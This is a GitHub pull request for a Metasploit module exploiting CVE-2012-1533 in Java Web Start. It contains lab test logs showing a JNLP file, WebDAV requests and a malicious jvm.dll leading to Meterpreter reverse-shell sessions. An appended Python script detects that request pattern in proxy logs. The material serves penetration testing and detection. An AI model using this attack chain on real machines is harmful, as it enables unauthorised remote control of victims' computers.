Add module for CVE-2012-1533 #1948

Merged
merged 1 commit into from Jun 12, 2013


jvazquez-r7
Contributor

All the credit goes to Rh0; I just got his msf module, cleaned it up and did the PR for him.

Webclient should be enabled on the w7 to use the webdav implementation on the module.

Tested on java 6 JRE 1.6.35 successfully:

msf exploit(java_ws_double_quote_clean) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:80/
[*] Server started.
msf exploit(java_ws_double_quote_clean) > [*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /WsgzmqneDkeG/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /WsgzmqneDkeG/" request from 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /WsgzmqneDkeG/sIPFsRRtEI.jnlp" request from 192.168.172.215:49962
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:49962...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/" request from 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/aWynQfZUJT.jnlp" request from 192.168.172.215:49970
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:49970...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to WebDAV "OPTIONS /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/jvm.dll" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL multistatus for /lwOofREESN4e4B/jvm.dll ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /lwOofREESN4e4B/jvm.dll" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL to 192.168.172.215:49978...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/lwOofREESN4e4B" does not contain a sub-directory, redirecting to /lwOofREESN4e4B/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /lwOofREESN4e4B/" request from 192.168.172.215:49978
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /lwOofREESN4e4B/ ...
[*] Sending stage (751104 bytes) to 192.168.172.215
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.215:49979) at 2013-06-12 14:38:45 -0500

msf exploit(java_ws_double_quote_clean) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


@jvazquez-r7
Contributor Author

Also tested successfully on JRE7u7... my log... even though it doesn't verify anything indeed haha, only your confidence in me :P

msf exploit(java_ws_double_quote_clean) > [*] 192.168.172.215  java_ws_double_quote_clean - Request for "/" does not contain a sub-directory, redirecting to /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/" request from 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Sending redirect to the JNLP file to 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/mlqvZMOZbIVET.jnlp" request from 192.168.172.215:50039
[*] 192.168.172.215  java_ws_double_quote_clean - Sending JNLP to 192.168.172.215:50039...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to WebDAV "OPTIONS /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Request for "/nk726OVHDQJhm" does not contain a sub-directory, redirecting to /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending directory multistatus for /nk726OVHDQJhm/ ...
[*] 192.168.172.215  java_ws_double_quote_clean - Received WebDAV "PROPFIND /nk726OVHDQJhm/jvm.dll" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL multistatus for /nk726OVHDQJhm/jvm.dll ...
[*] 192.168.172.215  java_ws_double_quote_clean - Responding to "GET /nk726OVHDQJhm/jvm.dll" request from 192.168.172.215:50047
[*] 192.168.172.215  java_ws_double_quote_clean - Sending DLL to 192.168.172.215:50047...
[*] Sending stage (751104 bytes) to 192.168.172.215
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.215:50048) at 2013-06-12 14:47:53 -0500

msf exploit(java_ws_double_quote_clean) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
sServer username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

@wchen-r7
Contributor

Verified:

msf exploit(java_ws_double_quote) > [*] 10.6.0.132       java_ws_double_quote - Request for "/" does not contain a sub-directory, redirecting to /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Sending redirect to the JNLP file to 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/POqAXlMPK.jnlp" request from 10.6.0.132:49414
[*] 10.6.0.132       java_ws_double_quote - Sending JNLP to 10.6.0.132:49414...
[*] 10.6.0.132       java_ws_double_quote - Responding to WebDAV "OPTIONS /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending directory multistatus for /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Request for "/dOKk8rdaXu1NPnb" does not contain a sub-directory, redirecting to /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending directory multistatus for /dOKk8rdaXu1NPnb/ ...
[*] 10.6.0.132       java_ws_double_quote - Received WebDAV "PROPFIND /dOKk8rdaXu1NPnb/jvm.dll" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending DLL multistatus for /dOKk8rdaXu1NPnb/jvm.dll ...
[*] 10.6.0.132       java_ws_double_quote - Responding to "GET /dOKk8rdaXu1NPnb/jvm.dll" request from 10.6.0.132:49422
[*] 10.6.0.132       java_ws_double_quote - Sending DLL to 10.6.0.132:49422...
[*] Sending stage (751104 bytes) to 10.6.0.132
[*] Meterpreter session 1 opened (10.6.0.142:4444 -> 10.6.0.132:49423) at 2013-06-12 16:17:40 -0500

wchen-r7 added a commit that referenced this pull request Jun 12, 2013
@wchen-r7 wchen-r7 merged commit afb2f83 into rapid7:master Jun 12, 2013
@jvazquez-r7 jvazquez-r7 deleted the java_ws_double_quote branch November 18, 2014 15:50
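
The test logs in this thread show a fixed request sequence from the client: a GET for a `.jnlp` file, then WebDAV PROPFIND and GET requests for `jvm.dll` under the same directory. The following is an added detection example for web-proxy logs, not part of the pull request or of Metasploit; the log format, the addresses, the function names and the two-minute correlation window are assumptions, and the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed proxy-log lines (not from the page): time, client, method, URL path.
SAMPLE_LOG = """\
2013-06-12T14:38:41 10.0.0.5 GET /AbCdEf/launch.jnlp
2013-06-12T14:38:42 10.0.0.5 OPTIONS /AbCdEf/
2013-06-12T14:38:43 10.0.0.5 PROPFIND /AbCdEf/jvm.dll
2013-06-12T14:38:44 10.0.0.5 GET /AbCdEf/jvm.dll
2013-06-12T14:40:00 10.0.0.9 GET /apps/tool.jnlp
2013-06-12T14:40:05 10.0.0.9 GET /apps/tool.jar
2013-06-12T15:00:00 10.0.0.7 PROPFIND /share/lib.dll
"""

LINE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+)$")
WINDOW = timedelta(minutes=2)  # assumed correlation window

def parent_dir(path):
    """Directory part of a URL path, e.g. /a/b.dll -> /a/."""
    return path.rsplit("/", 1)[0] + "/"

def find_jnlp_then_dll(log_text, window=WINDOW):
    """Return (client, directory, dll_path) tuples where a .jnlp download is
    followed by a PROPFIND or GET for a .dll in the same directory."""
    jnlp_seen = {}  # (client, directory) -> time of the last .jnlp GET
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip malformed lines instead of failing
        ts, client, method, path = m.groups()
        when = datetime.fromisoformat(ts)
        key = (client, parent_dir(path))
        lower = path.lower()
        if method == "GET" and lower.endswith(".jnlp"):
            jnlp_seen[key] = when
        elif method in ("PROPFIND", "GET") and lower.endswith(".dll"):
            start = jnlp_seen.get(key)
            if start is not None and timedelta(0) <= when - start <= window:
                hit = (client, key[1], path)
                if hit not in alerts:  # PROPFIND and GET report once
                    alerts.append(hit)
    return alerts

if __name__ == "__main__":
    for alert in find_jnlp_then_dll(SAMPLE_LOG):
        print("JNLP followed by DLL fetch:", alert)
```

A legitimate Java Web Start application fetches JARs after its JNLP file, so the `.jar` client above is not flagged; a DLL requested from the same remote directory as the JNLP is the part worth alerting on.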